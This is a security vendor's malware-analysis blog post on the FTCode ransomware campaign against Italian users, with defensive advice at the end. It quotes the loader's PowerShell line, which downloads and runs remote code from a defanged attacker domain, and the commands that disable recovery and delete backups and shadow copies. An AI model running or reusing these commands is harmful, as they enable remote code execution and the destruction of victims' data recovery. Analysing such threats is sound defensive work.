This article originally appeared on the AppRiver blog.
A ransomware named FTCode is being used in email campaigns targeting Italian customers. These have been arriving posing as resumes, invoices, or document scans. While monitoring for new variants we spotted a visual basic script (.vbs) which departed from the norm of what we have been recently analyzing in the fact it played music for us while encrypting files.
Chain of Infection
The .vbs file initially launches PowerShell (script below) to download and play a mp3 file from archive.org. At first glance we suspected it was just a renamed file extension for malware, a common practice to help evade some network gateways. However, we were amused to find it launches a Rammstein song mix. Rammstein is a German band formed in 1994 known for titles such as “Du Hast” and “Engel”. (More information about Rammstein’s music may be found at their site.)
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = $env:temp + '\ramst007.mp3';(New-ObjectNet.WebClient).DownloadFile('https://archive.org/download/RammsteinRammsteinMix/Cast_1_64kb.mp3',$a); Start-Process $a;iex ((New-Object Net.WebClient).DownloadString('hxxp://ceco.myheritageins[.]com/?need=streetm&vid=vbs4&4643'));
While you are rocking out to Rammstein, the script also reaches out to a different domain (myheritageins[.]com) to pull down another .vbs file. This one turns out to be the Jasper malware loader, it enables the actors to load additional malware of their choosing. In our test environment, it created a WindowsApplicationService.lnk shortcut in the Startup folder and utilized Windows task scheduler to achieve reboot persistence. At this point the malware will check to see if this file exists on the machine:
If the file does not exist, it will create it along with sending the encryption key and machine identification data to the attackers’ server. In the test environment it sent the information below:
If the file (C:\Users\Public\OracleKit\w00log03.tmp) does already exist, it surmises the machine has already been encrypted and the script does not run the ransomware. By creating this file and putting any data inside, users or administrators may be able to immunize the machine and prevent the ransomware from running. However, we anticipate attackers will add extra checks to help prevent this from occurring.
Like other ransomware, ftcode will also run the following commands to ignore boot failures, disable recovery, delete shadow volumes and system backups:
"C:\Windows\system32\cmd.exe" /c bcdedit /set vbwfatdjw bootstatuspolicy ignoreallfailures
"C:\Windows\system32\cmd.exe" /c bcdedit /set vbwfatdjw recoveryenabled no
"C:\Windows\system32\cmd.exe" /c wbadmin delete catalog -quiet
"C:\Windows\system32\cmd.exe" /c wbadmin delete systemstatebackup
"C:\Windows\system32\cmd.exe" /c wbadmin delete backup
"C:\Windows\system32\cmd.exe" /c vssadmin delete shadows /all /quiet
The file extensions encrypted include an extensive list, impacting the following file types greater than 50kb in size: .sql, .mp4, .7z, .rar, .m4a, .wma, .avi, .wmv, .csv, .d3dbsp, .zip, .sie, .sum, .ibank, .t13, .t12, .qdf, .gdb, .tax, .pkpass, .bc6, .bc7, .bkp, .qic, .bkf, .sidn, .sidd, .mddata, .itl, .itdb, .icxs, .hvpl, .hplg, .hkdb, .mdbackup, .syncdb, .gho, .cas, .svg, .map, .wmo, .itm, .sb, .fos, .mov, .vdf, .ztmp, .sis, .sid, .ncf, .menu, .layout, .dmp, .blob, .esm, .vcf, .vtf, .dazip, .fpk, .mlx, .kf, .iwd, .vpk, .tor, .psk, .rim, .w3x, .fsh, .ntl, .arch00, .lvl, .snx, .cfr, .ff, .vpp_pc, .lrf, .m2, .mcmeta, .vfs0, .mpqge, .kdb, .db0, .dba, .rofl, .hkx, .bar, .upk, .das, .iwi, .litemod, .asset, .forge, .ltx, .bsa, .apk, .re4, .sav, .lbf, .slm, .bik, .epk, .rgss3a, .pak, .big, wallet, .wotreplay, .xxx, .desc, .py, .m3u, .flv, .js, .css, .rb, .png, .jpeg, .txt, .p7c, .p7b, .p12, .pfx, .pem, .crt, .cer, .der, .x3f, .srw, .pef, .ptx, .r3d, .rw2, .rwl, .raw, .raf, .orf, .nrw, .mrwref, .mef, .erf, .kdc, .dcr, .cr2, .crw, .bay, .sr2, .srf, .arw, .3fr, .dng, .jpe, .jpg, .cdr, .indd, .ai, .eps, .pdf, .pdd, .psd, .dbf, .mdf, .wb2, .rtf, .wpd, .dxg, .xf, .dwg, .pst, .accdb, .mdb, .pptm, .pptx, .ppt, .xlk, .xlsb, .xlsm, .xlsx, .xls, .wps, .docm, .docx, .doc, .odb, .odc, .odm, .odp, .ods, .odt
Upon encrypting these file types, they will be renamed to an .ftcode extension. A note will also be left on the desktop of the machine instructing the user to download, install, and visit an onion site for further instructions. The onion site offers the visitor a chance to test file decryption with one file before they pay. This is an attempt to establish trust that decryption is possible with the user. The ransom starts out at $500. After 3 days it climbs to $2500, 5 days to $5000, and 10 days to $25000. It also threatens the private key will be deleted after 30 days (the files will not be recoverable).
Ransomware wallet addresses are typically unique to each attack. Regardless, we checked the balance in one and there wasn’t any BTC in it at the time of writing this blog.
Users should be vigilant to never click on or open unsolicited links or documents, especially with file types they aren’t familiar with such as script files (.vbs, .js, .ps1, .bat, etc.). Any Office file that, once opened, urges the user to Enable Content or Enable Editing should be treated with the utmost caution and verified from the sender out of band before doing so. If the file is malicious, enabling content or editing disables Microsoft’s protected view and can allow a malicious payload contained within to execute.
If no backups are available to restore files from, impacted users may also verify the type of ransomware at ID Ransomware to see if a publicly available decryptor for their particular ransomware attack exists. If not, they can also sign up for notifications to receive an alert if one becomes available in the future.
Learn how ZixProtect can help keep your inbox safe from ransomware like FTCode, along with other advanced threats.